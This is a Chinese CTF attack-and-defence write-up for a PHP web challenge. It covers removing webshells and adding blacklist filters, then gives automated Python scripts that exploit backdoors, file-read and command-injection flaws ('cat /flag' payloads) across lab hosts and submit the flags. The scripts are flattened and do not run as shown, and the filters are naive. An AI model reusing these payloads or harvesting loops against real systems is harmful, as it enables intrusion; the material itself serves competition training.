一、防御
1、改用户密码
passwd <user>
2、改数据库密码
进入数据库
mysql -uroot -proot
改密码
update mysql.user set password=password('新密码') where user='root';(适用于 MySQL 5.6 及以下;自 MySQL 5.7.6 起 mysql.user 表没有 password 列,需改用 ALTER USER 'root'@'<host>' IDENTIFIED BY '新密码';)
查看用户信息密码
select host,user,password from mysql.user;
改网站配置文件,将其中的数据库密码改为修改后的密码(不改的话网站连不上数据库会宕机)
3、删除匿名用户(默认会存在匿名用户登录(user为空的用户))
delete from mysql.user where user='';
4、刷新mysql
flush privileges;
5、处理一句话木马
用d盾扫描
/app/.a.php
一句话木马
法一:直接删除这个文件
rm -r .a.php
法二:写入空白
echo > .a.php
法三:注释
/app/a.php
一句话木马+打印出包含有关服务器和执行环境的信息
处理方法同/app/.a.php
/app/config.php
注释
/app/index.php
注释
6、任意文件读取漏洞
/app/about.php
结合自己的网页尝试看看也方便后面攻击
法一:注释(这里不是功能点直接注释就行)
法二:写waf(以防注释到功能点)
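<?php
// Request filter for about.php, placed in the app directory: any GET
// parameter containing a blacklisted substring gets a 403 before the page
// logic runs. Matching is a plain case-sensitive substring test (strpos),
// so "flag" is rejected wherever it occurs in a value, including inside a
// longer word. Only $_GET is inspected here; POST and COOKIE values reach
// the page unfiltered. How this file is wired into the page is not shown;
// note that `global` below only resolves when the file is included at file
// scope — included from inside a function, $restricted_chars is not a
// global and check_input() has nothing to match against.

// Substrings that must not appear in any GET value.
$restricted_chars = array("flag");

/**
 * Return $data unchanged if it contains none of $restricted_chars,
 * otherwise terminate the request via block_request().
 *
 * Nested arrays (PHP builds them from `key[]=...` parameters) are walked
 * element by element. The original single-string version passed the whole
 * array to strpos(), which throws a TypeError on PHP 8 and on PHP 7 only
 * warns and returns null (which `!== false` then treats as a hit), so the
 * element values themselves were never compared.
 *
 * @param mixed $data request value: a string or a (nested) array of strings
 * @return mixed the same value, returned only when it passed the filter
 */
function check_input($data) {
    global $restricted_chars;
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $data[$k] = check_input($v);
        }
        return $data;
    }
    $text = (string)$data;
    foreach ($restricted_chars as $char) {
        if (strpos($text, $char) !== false) {
            block_request(); // restricted substring found: deny the request
        }
    }
    return $data;
}

/**
 * Deny the current request: send HTTP 403 and stop execution. Never returns.
 */
function block_request() {
    http_response_code(403); // 403 Forbidden status code
    die("Forbidden");        // stop before the protected page runs
}

// Filter every GET parameter in place before the page reads it.
foreach ($_GET as $key => $value) {
    $_GET[$key] = check_input($value);
}
?>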
将文件上传至app目录
注:这里的waf文件名不能为中文否则不被识别
/app/contact.php
处理方法同/app/about.php
7、命令执行漏洞
/app/footer.php
POST请求命令
法一:注释
法二:waf
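<?php
// Request filter for footer.php, placed in the app directory: any POST
// parameter containing a blacklisted substring gets a 403 before the page
// logic runs. Matching is a plain case-sensitive substring test (strpos),
// so the "ls" entry also rejects ordinary values such as "false" or
// "details". Despite the original comment, only $_POST is inspected; GET
// and COOKIE values reach the page unfiltered. How this file is wired into
// the page is not shown; note that `global` below only resolves when the
// file is included at file scope — included from inside a function,
// $restricted_chars is not a global and check_input() has nothing to match.

// Substrings that must not appear in any POST value.
$restricted_chars = array("cat","flag","ls");

/**
 * Return $data unchanged if it contains none of $restricted_chars,
 * otherwise terminate the request via block_request().
 *
 * Nested arrays (PHP builds them from `key[]=...` parameters) are walked
 * element by element. The original single-string version passed the whole
 * array to strpos(), which throws a TypeError on PHP 8 and on PHP 7 only
 * warns and returns null (which `!== false` then treats as a hit), so the
 * element values themselves were never compared.
 *
 * @param mixed $data request value: a string or a (nested) array of strings
 * @return mixed the same value, returned only when it passed the filter
 */
function check_input($data) {
    global $restricted_chars;
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $data[$k] = check_input($v);
        }
        return $data;
    }
    $text = (string)$data;
    foreach ($restricted_chars as $char) {
        if (strpos($text, $char) !== false) {
            block_request(); // restricted substring found: deny the request
        }
    }
    return $data;
}

/**
 * Deny the current request: send HTTP 403 and stop execution. Never returns.
 */
function block_request() {
    http_response_code(403); // 403 Forbidden status code
    die("Forbidden");        // stop before the protected page runs
}

// Filter every POST parameter in place before the page reads it.
foreach ($_POST as $key => $value) {
    $_POST[$key] = check_input($value);
}
?>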
/app/admin/footer.php
处理同/app/footer.php
/app/admin/header.php
GET请求命令
法一:注释
法二:写waf
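<?php
// Request filter for admin/header.php, placed in the app directory: any GET
// parameter containing a blacklisted substring gets a 403 before the page
// logic runs. Matching is a plain case-sensitive substring test (strpos),
// so the "ls" entry also rejects ordinary values such as "false" or
// "details". Despite the original comment, only $_GET is inspected; POST
// and COOKIE values reach the page unfiltered. How this file is wired into
// the page is not shown; note that `global` below only resolves when the
// file is included at file scope — included from inside a function,
// $restricted_chars is not a global and check_input() has nothing to match.

// Substrings that must not appear in any GET value.
$restricted_chars = array("cat","flag","ls");

/**
 * Return $data unchanged if it contains none of $restricted_chars,
 * otherwise terminate the request via block_request().
 *
 * Nested arrays (PHP builds them from `key[]=...` parameters) are walked
 * element by element. The original single-string version passed the whole
 * array to strpos(), which throws a TypeError on PHP 8 and on PHP 7 only
 * warns and returns null (which `!== false` then treats as a hit), so the
 * element values themselves were never compared.
 *
 * @param mixed $data request value: a string or a (nested) array of strings
 * @return mixed the same value, returned only when it passed the filter
 */
function check_input($data) {
    global $restricted_chars;
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $data[$k] = check_input($v);
        }
        return $data;
    }
    $text = (string)$data;
    foreach ($restricted_chars as $char) {
        if (strpos($text, $char) !== false) {
            block_request(); // restricted substring found: deny the request
        }
    }
    return $data;
}

/**
 * Deny the current request: send HTTP 403 and stop execution. Never returns.
 */
function block_request() {
    http_response_code(403); // 403 Forbidden status code
    die("Forbidden");        // stop before the protected page runs
}

// Filter every GET parameter in place before the page reads it.
foreach ($_GET as $key => $value) {
    $_GET[$key] = check_input($value);
}
?>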
8、sql注入
/app/search.php
法一:用sqlmap扫描,可以发现注入点(有union注入、布尔盲注、时间盲注)
法二:手注测试(比较菜只测出了布尔盲注)
true页面
false页面
上waf
/app/login.php
9、修改后台登入密码
先用navicat连上自己的数据库
注意端口是3306不要被mysql_port误导了
连上后进入admin表改后台密码
10、信息泄露
登入后台发现直接得到flag
查看/app/admin/index.php,发现有段php代码进行命令执行
直接注释
11、文件上传漏洞
登入后台后会发现一个文件上传
上传一个文件
/app/admin/upload.php
部署一个文件上传监测脚本
二、攻击
1、扫web端口
nmap <ip> -p <范围>
2、连数据库
尝试看看能不能用navicat直接无密码连接上数据库(如果数据库密码没改的话)
3、后门
/app/.a.php
写自动化exp
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `payload = ...` assignment, and from the first `#` on the `urls` line
# onward Python treats the rest of that line as one comment, so the script
# does not run as shown; its block structure (in particular whether
# os.remove() sits inside or after the submission loop) cannot be recovered.
# Read as written: job() calls get_flag() then support_flag() and on its
# first run registers itself with schedule every 5 minutes. get_flag() sends
# GET <host>/.a.php?c=system('cat /flag'); to every host in `urls` and, on a
# 200, appends the first response line to hm_flag1.txt; support_flag() POSTs
# each line of that file with the hard-coded `token` to the :9090 endpoint,
# sleeping 1 s per submission, then deletes the file.
# Defender's view: this is the traffic the 一.5 fix for /app/.a.php stops
# (once .a.php is deleted or emptied there is nothing to harvest), and a
# repeated hit on a dot-prefixed .php file with a `c=` parameter on a fixed
# 5-minute cadence from one client is the access-log pattern to alert on.
# The submission token is kept in plaintext in the script.
import ospayload ="?c=system('cat /flag');"
page=".a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]with open('hm_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('hm_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/a.php
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `payload = ...` assignment, and everything after the first `#` on the
# `urls` line is one comment to Python, so the script does not run as shown
# and its block structure cannot be recovered from the text.
# Read as written: same 5-minute schedule/harvest/submit loop as the .a.php
# script, but against a.php; the first response line has the
# `<pre class='xdebug-var-dump' dir='ltr'>` prefix stripped before it is
# appended to hm_flag2.txt, which support_flag() then POSTs line by line
# with the hard-coded `token` to the :9090 endpoint and deletes.
# Defender's view: that prefix means a.php dumps command output through
# xdebug's var_dump, so the 一.5 fix (comment out / delete a.php) removes
# both the execution and the distinctive markup; the request itself
# (a.php with a `c=` parameter) is the log pattern to watch.
import ospayload ="?c=system('cat /flag');"
page="a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]# 删除多余内容comment = "<pre class='xdebug-var-dump' dir='ltr'>"cleaned_line = choice_line.replace(comment, "")with open('hm_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('hm_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag2.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/config.php
同/app/.a.php
/app/index.php
同/app/a.php,改为第83行,改删<!-- banner -->
4、任意文件读取漏洞
/app/about.php
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `payload = ...` assignment, and everything after the first `#` on the
# `urls` line is one comment to Python, so the script does not run as shown
# and its block structure cannot be recovered from the text.
# Read as written: every 5 minutes get_flag() sends GET <host>/about.php?file=/flag
# to each host in `urls`, strips `<!-- banner -->` from the first response
# line and appends it to ry_flag1.txt; support_flag() POSTs each line with
# the hard-coded `token` to the :9090 endpoint and deletes the file.
# Defender's view: the value `/flag` contains the substring "flag", so the
# 一.6 filter for about.php answers this request with 403 and the
# `status_code == 200` branch never runs; a `file=` parameter holding an
# absolute path is the access-log pattern to alert on.
import ospayload ="?file=/flag"
page="about.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag1.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/contact.php
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `payload = ...` assignment, and everything after the first `#` on the
# `urls` line is one comment to Python, so the script does not run as shown
# and its block structure cannot be recovered from the text.
# Read as written: same loop as the about.php script, but GET
# <host>/contact.php?path=/flag and the 83rd response line (`lines[82]`) is
# harvested into ry_flag2.txt. `lines[82]` raises IndexError when a response
# has fewer than 83 lines, which aborts job() — and with it the scheduled
# run — with a traceback rather than skipping that host.
# Defender's view: `/flag` contains "flag", so the 一.6 filter applied to
# contact.php returns 403 and the 200 branch is skipped; commenting out the
# include instead (法一) still returns 200 but with page content in place of
# the file, so whatever is on line 83 gets submitted as a flag.
import ospayload ="?path=/flag"
page="contact.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第83行行内容choice_line = lines[82]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag2.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
5、命令执行
/app/footer.php
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `page = ...` assignment, and everything after the first `#` on the `urls`
# line is one comment to Python, so the script does not run as shown and
# its block structure cannot be recovered from the text. Unlike the GET
# scripts there is no `payload` variable: get_flag() POSTs the form field
# `shell=cat /flag` to <host>/footer.php and, on a 200, appends the first
# response line to rce_flag1.txt, which support_flag() submits line by line
# with the hard-coded `token` to the :9090 endpoint and then deletes.
# Defender's view: the POST value contains both "cat" and "flag", so the
# 一.7 filter for footer.php rejects it with 403 and the 200 branch never
# runs; a POST to footer.php carrying a `shell` field is the access-log
# pattern to alert on.
import ospage="footer.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page# print(n_url)data = {"shell":"cat /flag"}response = requests.post(url=n_url,data=data)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]with open('rce_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('rce_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/admin/footer.php
同/app/footer.php
/app/admin/header.php
import requests
import time
import schedule
# NOTE(review): flattened listing — the next line fuses `import os` with the
# `payload = ...` assignment, and everything after the first `#` on the
# `urls` line is one comment to Python, so the script does not run as shown
# and its block structure cannot be recovered from the text.
# Read as written: every 5 minutes get_flag() sends GET
# <host>/admin/header.php?p=cat%20/flag to each host, takes the first
# response line, strips the two `comments` fragments (the echoed command plus
# the xdebug var_dump markup around the output) and appends the result to
# rce_flag3.txt; support_flag() POSTs each line with the hard-coded `token`
# to the :9090 endpoint and deletes the file. The `for comment in comments`
# stripping loop appears twice; the second pass is a no-op duplicate.
# Defender's view: PHP decodes `%20` before the 一.7 filter sees the value,
# so `cat /flag` matches both "cat" and "flag" and the request gets a 403;
# a `p=` parameter on admin/header.php carrying a shell command is the
# access-log pattern to alert on, and the var_dump markup shows the page
# runs with xdebug output enabled.
import ospayload ="?p=cat%20/flag"
page="admin/header.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comments = ["cat /flag<pre class='xdebug-var-dump' dir='ltr'><small>string</small> <font color='#cc0000'>'","'</font> <i>(length=32)</i>"]cleaned_line = choice_linefor comment in comments:cleaned_line = cleaned_line.replace(comment, "")for comment in comments:cleaned_line = cleaned_line.replace(comment, "")with open('rce_flag3.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('rce_flag3.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag3.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)